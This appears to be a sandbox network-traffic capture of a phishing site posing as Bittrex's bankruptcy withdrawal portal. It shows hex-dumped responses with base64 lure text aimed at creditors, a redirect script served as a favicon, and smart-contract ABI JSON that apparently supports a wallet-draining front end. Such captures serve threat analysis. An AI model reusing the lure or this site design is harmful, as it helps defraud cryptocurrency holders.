                          2024-03-28 14:45:28 UTC1369INData Raw: 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 63 36 63 65 62 3b 20 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 20 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 20 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 20 0a 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20
                          Data Ascii: tton { display: inline-block; padding: 10px 20px; background-color: #1c6ceb; color: white; font-size: 16px; border: none; border-radius: 5px; cursor: pointer; text-decoration:
                          2024-03-28 14:45:28 UTC1369INData Raw: 6e 52 70 5a 6d 6c 6c 5a 43 42 68 63 79 42 68 62 69 42 68 5a 6d 5a 6c 59 33 52 6c 5a 43 42 6a 63 6d 56 6b 61 58 52 76 63 69 42 70 62 69 42 43 61 58 52 30 63 6d 56 34 4a 33 4d 67 59 32 68 68 63 48 52 6c 63 69 41 78 4d 53 42 69 59 57 35 72 63 6e 56 77 64 47 4e 35 4c 69 42 4a 64 43 64 7a 49 48 42 76 63 33 4e 70 59 6d 78 6c 49 48 6c 76 64 53 42 6b 61 57 52 75 4a 33 51 67 5a 6d 6c 73 5a 53 42 68 49 46 42 79 62 32 39 6d 49 47 39 6d 49 45 4e 73 59 57 6c 74 49 47 4a 6c 5a 6d 39 79 5a 53 42 30 61 47 55 67 5a 47 56 68 5a 47 78 70 62 6d 55 75 49 45 68 76 64 32 56 32 5a 58 49 73 49 48 6c 76 64 53 42 6a 59 57 34 67 63 33 52 70 62 47 77 67 64 32 6c 30 61 47 52 79 59 58 63 67 59 57 35 35 49 47 46 7a 63 32 56 30 63 79 42 6c 62 6e 52 70 64 47 78 6c 5a 43 42 30 62 79 42 35
                          Data Ascii: nRpZmllZCBhcyBhbiBhZmZlY3RlZCBjcmVkaXRvciBpbiBCaXR0cmV4J3MgY2hhcHRlciAxMSBiYW5rcnVwdGN5LiBJdCdzIHBvc3NpYmxlIHlvdSBkaWRuJ3QgZmlsZSBhIFByb29mIG9mIENsYWltIGJlZm9yZSB0aGUgZGVhZGxpbmUuIEhvd2V2ZXIsIHlvdSBjYW4gc3RpbGwgd2l0aGRyYXcgYW55IGFzc2V0cyBlbnRpdGxlZCB0byB5
                          2024-03-28 14:45:28 UTC1369INData Raw: 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 45 76 4e 54 68 51 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 6b 56 53 52 56 4a 46 55 6b 46 42 51 55 46 46 55 6b 56 53 52 56 4a 46 51 55 46 42 51 56 4a 42 51 55 46 42 52 56 46 42 51 55 46 43 52 55 46 42 51 55 46 42 51 55 46 42 51 55 56 52 51 56 4a 46 55 67 70 46 55 6b 56 52 51 56 4a 42 51 6b 56 53 52 56 4a 46 55 6b 46 43 52 55 46 46 55 55 46 53 51 55 4a 46 51 55 56 52 51 56 4a 42 51 6b 56 42 52 56 46 42 55
                          Data Ascii: FBQUFBQUFBQUFBQUEvNThQQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQkVSRVJFUkFBQUFFUkVSRVJFQUFBQVJBQUFBRVFBQUFCRUFBQUFBQUFBQUVRQVJFUgpFUkVRQVJBQkVSRVJFUkFCRUFFUUFSQUJFQUVRQVJBQkVBRVFBU
                          2024-03-28 14:45:28 UTC1369INData Raw: 48 6c 4f 56 45 30 30 53 55 52 46 64 55 39 45 54 58 64 4f 61 6c 56 6e 54 6c 52 4e 64 55 31 45 51 54 56 4e 61 55 46 34 54 47 70 52 4d 55 31 45 61 7a 4a 4a 52 46 56 35 54 47 70 5a 4e 55 31 45 54 57 64 4e 55 7a 52 34 54 58 70 72 64 30 35 72 54 54 46 4e 55 7a 51 31 54 31 52 5a 65 6b 6c 45 51 58 56 4f 52 46 6c 35 54 30 52 56 65 45 6c 45 56 58 64 4d 61 6d 64 35 54 30 52 46 5a 30 31 44 4e 48 64 4e 52 45 56 36 54 56 52 4a 65 55 35 70 51 54 42 50 55 7a 52 35 54 6c 52 6a 4d 45 6c 45 51 58 56 4e 52 45 46 34 54 58 70 46 65 55 31 71 57 6b 6c 4f 52 45 56 31 54 55 52 46 4d 55 39 57 57 58 68 4f 51 7a 51 79 54 6b 56 6e 4d 45 39 54 4e 44 52 4f 56 45 55 77 55 58 70 56 64 30 78 71 56 54 42 4e 56 45 6c 6e 54 56 52 52 64 55 35 71 56 58 70 50 55 30 45 78 54 56 4d 30 65 55 31 71
                          Data Ascii: HlOVE00SURFdU9ETXdOalVnTlRNdU1EQTVNaUF4TGpRMU1EazJJRFV5TGpZNU1ETWdNUzR4TXprd05rTTFNUzQ1T1RZeklEQXVORFl5T0RVeElEVXdMamd5T0RFZ01DNHdNREV6TVRJeU5pQTBPUzR5TlRjMElEQXVNREF4TXpFeU1qWklOREV1TURFMU9WWXhOQzQyTkVnME9TNDROVEUwUXpVd0xqVTBNVElnTVRRdU5qVXpPU0ExTVM0eU1q
                          2024-03-28 14:45:28 UTC1369INData Raw: 52 4a 5a 30 31 55 52 58 56 4e 65 6d 74 36 54 56 5a 77 54 6b 35 45 61 33 56 50 52 47 63 30 54 31 4e 42 65 6b 78 71 59 33 64 4e 52 47 4d 30 55 58 70 52 4e 55 78 71 61 7a 4e 4e 61 6b 31 6e 54 58 6b 30 4e 55 31 55 56 54 52 4e 65 55 45 78 54 55 4d 30 64 30 31 55 55 54 4e 4a 52 46 46 31 54 56 52 52 4d 45 35 55 56 57 64 4f 56 45 46 31 54 55 52 46 4d 45 31 54 51 54 42 4d 61 6b 30 7a 54 6c 52 46 4e 56 46 36 56 58 64 4d 61 6b 46 34 54 30 52 56 5a 30 35 44 4e 44 4a 4e 65 6b 6b 31 54 58 6c 42 4d 45 39 54 4e 44 56 4f 65 6c 6c 34 53 55 52 52 64 55 39 45 5a 7a 56 4e 65 6b 6c 6e 54 6b 52 72 64 55 39 45 5a 7a 52 50 55 30 45 78 54 47 70 46 65 6b 31 55 62 45 52 4f 52 47 74 31 54 30 52 4a 65 45 31 54 51 54 46 4d 61 6b 31 34 54 30 52 6a 5a 30 35 45 61 33 56 4f 65 6b 56 34 54
                          Data Ascii: RJZ01URXVNemt6TVZwTk5Ea3VPRGc0T1NBekxqY3dNRGM0UXpRNUxqazNNak1nTXk0NU1UVTRNeUExTUM0d01UUTNJRFF1TVRRME5UVWdOVEF1TURFME1TQTBMak0zTlRFNVF6VXdMakF4T0RVZ05DNDJNekk1TXlBME9TNDVOell4SURRdU9EZzVNeklnTkRrdU9EZzRPU0ExTGpFek1UbERORGt1T0RJeE1TQTFMak14T0RjZ05Ea3VOekV4T
                          2024-03-28 14:45:28 UTC1369INData Raw: 68 52 32 77 77 57 6c 4e 4a 64 6c 42 6e 4d 45 74 51 53 45 4a 6f 5a 45 64 6e 5a 31 70 45 4d 47 6c 55 56 45 56 33 54 58 6b 30 4e 45 39 44 51 54 4e 4d 61 6b 46 36 54 6c 52 6a 4d 6c 46 36 52 58 64 4f 51 7a 52 35 54 57 70 72 5a 30 35 70 4e 44 42 4e 65 6b 6b 31 53 55 52 46 64 30 35 44 4e 44 42 4e 61 6d 74 6e 54 6c 4d 30 4d 55 35 55 57 58 70 4e 65 55 46 34 54 55 52 52 64 55 35 45 53 54 56 4a 52 46 46 31 54 6b 52 56 64 30 35 36 61 45 52 4e 56 45 45 77 54 47 70 52 65 6b 35 35 51 58 70 4d 61 6d 74 35 54 6b 52 46 5a 30 31 55 51 54 42 4d 61 6b 30 30 54 6c 4e 42 65 6b 78 71 54 54 56 50 52 45 6c 36 53 55 52 46 64 30 35 44 4e 48 6c 4f 65 6b 6c 6e 54 57 6b 30 4e 45 39 45 54 54 4e 52 65 6b 56 33 54 6b 4d 30 65 45 35 36 57 57 64 4e 61 54 51 77 54 6c 52 72 65 6b 39 54 51 58
                          Data Ascii: hR2wwWlNJdlBnMEtQSEJoZEdnZ1pEMGlUVEV3TXk0NE9DQTNMakF6TlRjMlF6RXdOQzR5TWprZ05pNDBNekk1SURFd05DNDBNamtnTlM0MU5UWXpNeUF4TURRdU5ESTVJRFF1TkRVd056aERNVEEwTGpRek55QXpMamt5TkRFZ01UQTBMak00TlNBekxqTTVPREl6SURFd05DNHlOeklnTWk0NE9ETTNRekV3TkM0eE56WWdNaTQwTlRrek9TQX
                          2024-03-28 14:45:28 UTC1369INData Raw: 4d 45 39 55 54 54 46 52 65 6b 56 33 54 55 4d 30 4e 45 35 55 61 32 64 4e 65 54 51 7a 54 55 52 6a 65 55 35 35 51 58 68 4e 52 45 46 31 54 30 52 6a 4e 55 6c 45 54 58 56 4f 65 6c 6b 7a 54 56 52 46 5a 30 31 55 51 58 64 4d 61 6d 63 31 54 58 6c 42 65 6b 78 71 5a 33 6c 50 52 45 6b 77 55 58 70 46 64 30 31 44 4e 44 56 4f 56 45 6c 6e 54 6b 4d 30 65 45 31 55 57 57 64 4e 56 45 46 33 54 47 70 72 4e 45 31 54 51 54 42 4d 61 6c 46 33 54 31 52 4a 65 55 6c 45 52 58 64 4e 51 7a 51 31 54 6e 70 6e 5a 30 35 44 4e 44 4e 4e 52 45 31 33 54 57 74 4e 65 45 31 45 51 58 56 50 56 47 4d 7a 53 55 52 52 64 55 39 45 5a 7a 4e 4f 65 6c 56 6e 54 56 52 42 64 30 78 71 61 7a 4a 4a 52 46 56 31 54 55 52 6a 65 55 31 45 56 57 64 4e 56 45 46 33 54 47 70 72 65 55 39 44 51 54 46 4d 61 6b 6b 78 54 6b 56
                          Data Ascii: ME9UTTFRekV3TUM0NE5Ua2dNeTQzTURjeU55QXhNREF1T0RjNUlETXVOelkzTVRFZ01UQXdMamc1TXlBekxqZ3lPREkwUXpFd01DNDVOVElnTkM0eE1UWWdNVEF3TGprNE1TQTBMalF3T1RJeUlERXdNQzQ1TnpnZ05DNDNNRE13TWtNeE1EQXVPVGMzSURRdU9EZzNOelVnTVRBd0xqazJJRFV1TURjeU1EVWdNVEF3TGpreU9DQTFMakkxTkV
                          2024-03-28 14:45:28 UTC1369INData Raw: 45 45 79 53 55 52 6a 65 6b 78 71 51 58 64 50 52 47 74 6e 54 57 70 46 64 55 39 55 52 58 64 4f 61 30 30 7a 54 6b 4d 30 4d 55 31 71 56 54 56 4a 52 45 6c 34 54 47 70 72 65 45 31 45 57 57 64 4f 65 6c 56 31 54 6b 52 42 64 30 35 35 51 58 6c 4e 61 54 51 77 54 55 52 5a 65 55 6c 45 59 7a 46 4d 61 6d 64 35 54 6b 52 5a 5a 30 31 71 54 58 56 4e 56 46 6c 35 54 31 56 4e 4d 30 35 70 4e 48 64 4f 56 45 46 35 53 55 52 4a 65 6b 78 71 56 54 4a 4e 56 47 64 6e 54 6e 70 5a 64 55 31 55 57 54 52 4f 61 55 46 35 54 6b 4d 30 64 30 31 55 53 58 70 4a 52 47 4d 79 54 47 70 46 4d 6b 39 45 52 57 64 4e 61 6c 46 31 54 6b 52 6a 64 30 35 72 5a 7a 4e 4f 51 7a 51 79 54 6c 52 46 65 46 46 36 59 7a 42 4d 61 6c 6c 36 54 57 70 72 5a 30 31 71 55 58 56 4e 56 46 6b 30 54 6b 4e 42 4d 30 35 44 4e 44 46 4e
                          Data Ascii: EEySURjekxqQXdPRGtnTWpFdU9URXdOa00zTkM0MU1qVTVJREl4TGpreE1EWWdOelV1TkRBd055QXlNaTQwTURZeUlEYzFMamd5TkRZZ01qTXVNVFl5T1VNM05pNHdOVEF5SURJekxqVTJNVGdnTnpZdU1UWTROaUF5TkM0d01USXpJRGMyTGpFMk9ERWdNalF1TkRjd05rZzNOQzQyTlRFeFF6YzBMall6TWprZ01qUXVNVFk0TkNBM05DNDFN


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449743172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:28 UTC370OUTGET /favicon.ico HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:28 UTC646INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 09:41:29 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 2478
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nltr688rK5lYvxUJkCLPGQ%2BVIYIlY5ywF1Ms68T4NcVOOiKFXEfI0JOzEMJymUzsa8PLrcbOQK%2FWLW%2BgrjY3lVmAsmUlFAYr8oZ6TbFzsh41kj9ohQAdfl%2F1pKnxCPsrVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b867747b276faa-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:28 UTC70INData Raw: 34 30 0d 0a 3c 73 63 72 69 70 74 3e 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 0a 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a
                          Data Ascii: 40<script>window.location.href = "https://google.com"</script>
                          2024-03-28 14:45:28 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449745172.67.150.614436020C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-03-28 14:45:28 UTC627OUTGET /bankruptcy/withdrawal/chapter11/debtor/js/contracts.js HTTP/1.1
                          Host: us-bittrex.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: sessionid=0
                          2024-03-28 14:45:28 UTC700INHTTP/1.1 200 OK
                          Date: Thu, 28 Mar 2024 14:45:28 GMT
                          Content-Type: application/javascript
                          Content-Length: 79880
                          Connection: close
                          Last-Modified: Thu, 28 Mar 2024 11:54:49 GMT
                          ETag: "66055a89-13808"
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 2454
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lb6DpHjkk%2FOmP4uGn83MVSEVs6MV33xQ5xs7VC7au1ZO%2F534bx7ZJ%2BmNYj%2FfheB4q5xb9Bz27qRmG1NIVdmFsFehMxiMhJrJxzl8IlsAEDhKtPrMcQz3GMxzWIh5vlVsWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 86b86775b96e0607-IAD
                          alt-svc: h3=":443"; ma=86400
                          2024-03-28 14:45:28 UTC669INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 69 6e 6b 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 69 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 37 32 5d 2c 7b 35 31 38 36 36 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 5b 7b 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 63 6f 6e 74 72 61 63 74 20 49 50 6f 6f 6c 41 64 64 72 65 73 73 65 73 50 72 6f 76 69 64 65 72 22 2c 22 6e 61 6d 65 22 3a 22 70 72 6f 76 69 64 65 72 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 5b 5d 22 2c 22 6e 61 6d 65 22 3a 22 61 73 73 65 74 73 22 2c 22 74 79 70 65
                          Data Ascii: "use strict";(self.webpackChunkpink=self.webpackChunkpink||[]).push([[672],{51866:e=>{e.exports=JSON.parse('[{"inputs":[{"internalType":"contract IPoolAddressesProvider","name":"provider","type":"address"},{"internalType":"address[]","name":"assets","type
                          2024-03-28 14:45:28 UTC1369INData Raw: 3a 22 61 73 73 65 74 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 74 72 75 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 73 6f 75 72 63 65 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 22 6e 61 6d 65 22 3a 22 41 73 73 65 74 53 6f 75 72 63 65 55 70 64 61 74 65 64 22 2c 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 7d 2c 7b 22 61 6e 6f 6e 79 6d 6f 75 73 22 3a 66 61 6c 73 65 2c 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 64 65 78 65 64 22 3a 74 72 75 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 62 61 73 65 43 75 72 72 65 6e 63 79 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22
                          Data Ascii: :"asset","type":"address"},{"indexed":true,"internalType":"address","name":"source","type":"address"}],"name":"AssetSourceUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"baseCurrency","type":"address"
                          2024-03-28 14:45:28 UTC1369INData Raw: 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 5b 5d 22 7d 5d 2c 22 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 22 3a 22 76 69 65 77 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 5d 2c 22 6e 61 6d 65 22 3a 22 67 65 74 46 61 6c 6c 62 61 63 6b 4f 72 61 63 6c 65 22 2c 22 6f 75 74 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 5d 2c 22 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 22 3a 22 76 69 65 77 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22
                          Data Ascii: ","type":"uint256[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getFallbackOracle","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","
                          2024-03-28 14:45:28 UTC1369INData Raw: 72 75 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 31 36 22 2c 22 6e 61 6d 65 22 3a 22 72 65 66 65 72 72 61 6c 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 31 36 22 7d 5d 2c 22 6e 61 6d 65 22 3a 22 42 6f 72 72 6f 77 22 2c 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 7d 2c 7b 22 61 6e 6f 6e 79 6d 6f 75 73 22 3a 66 61 6c 73 65 2c 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 64 65 78 65 64 22 3a 74 72 75 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 72 65 73 65 72 76 65 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 66 61 6c 73 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 75 73 65 72
                          Data Ascii: rue,"internalType":"uint16","name":"referral","type":"uint16"}],"name":"Borrow","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"reserve","type":"address"},{"indexed":false,"internalType":"address","name":"user
                          2024-03-28 14:45:28 UTC1369INData Raw: 2c 22 6e 61 6d 65 22 3a 22 64 65 62 74 54 6f 43 6f 76 65 72 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 66 61 6c 73 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 6c 69 71 75 69 64 61 74 65 64 43 6f 6c 6c 61 74 65 72 61 6c 41 6d 6f 75 6e 74 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 66 61 6c 73 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 6c 69 71 75 69 64 61 74 6f 72 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 66 61 6c 73 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 62 6f 6f 6c 22 2c
                          Data Ascii: ,"name":"debtToCover","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"liquidatedCollateralAmount","type":"uint256"},{"indexed":false,"internalType":"address","name":"liquidator","type":"address"},{"indexed":false,"internalType":"bool",
                          2024-03-28 14:45:28 UTC1369INData Raw: 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 6c 69 71 75 69 64 69 74 79 49 6e 64 65 78 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 2c 7b 22 69 6e 64 65 78 65 64 22 3a 66 61 6c 73 65 2c 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 76 61 72 69 61 62 6c 65 42 6f 72 72 6f 77 49 6e 64 65 78 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 22 6e 61 6d 65 22 3a 22 52 65 73 65 72 76 65 44 61 74 61 55 70 64 61 74 65 64 22 2c 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 7d 2c 7b 22 61 6e 6f 6e 79 6d 6f 75 73 22 3a 66 61 6c 73 65 2c 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 64 65 78 65 64 22 3a 74 72 75 65 2c 22 69 6e 74 65 72 6e 61 6c
                          Data Ascii: "internalType":"uint256","name":"liquidityIndex","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"variableBorrowIndex","type":"uint256"}],"name":"ReserveDataUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internal
                          2024-03-28 14:45:28 UTC1369INData Raw: 74 79 70 65 22 3a 22 65 76 65 6e 74 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 5d 2c 22 6e 61 6d 65 22 3a 22 46 4c 41 53 48 4c 4f 41 4e 5f 50 52 45 4d 49 55 4d 5f 54 4f 54 41 4c 22 2c 22 6f 75 74 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 22 2c 22 74 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 7d 5d 2c 22 73 74 61 74 65 4d 75 74 61 62 69 6c 69 74 79 22 3a 22 76 69 65 77 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 5d 2c 22 6e 61 6d 65 22 3a 22 4c 45 4e 44 49 4e 47 50 4f 4f 4c 5f 52 45 56 49 53 49 4f 4e 22 2c 22 6f 75 74 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d
                          Data Ascii: type":"event"},{"inputs":[],"name":"FLASHLOAN_PREMIUM_TOTAL","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"LENDINGPOOL_REVISION","outputs":[{"internalType":"uint256","nam
                          2024-03-28 14:45:28 UTC1369INData Raw: 65 22 2c 22 74 79 70 65 22 3a 22 66 75 6e 63 74 69 6f 6e 22 7d 2c 7b 22 69 6e 70 75 74 73 22 3a 5b 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 61 73 73 65 74 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 66 72 6f 6d 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 2c 22 6e 61 6d 65 22 3a 22 74 6f 22 2c 22 74 79 70 65 22 3a 22 61 64 64 72 65 73 73 22 7d 2c 7b 22 69 6e 74 65 72 6e 61 6c 54 79 70 65 22 3a 22 75 69 6e 74 32 35 36 22 2c 22 6e 61 6d 65 22 3a 22 61 6d 6f 75 6e 74 22 2c 22 74 79 70 65 22 3a
                          Data Ascii: e","type":"function"},{"inputs":[{"internalType":"address","name":"asset","type":"address"},{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":
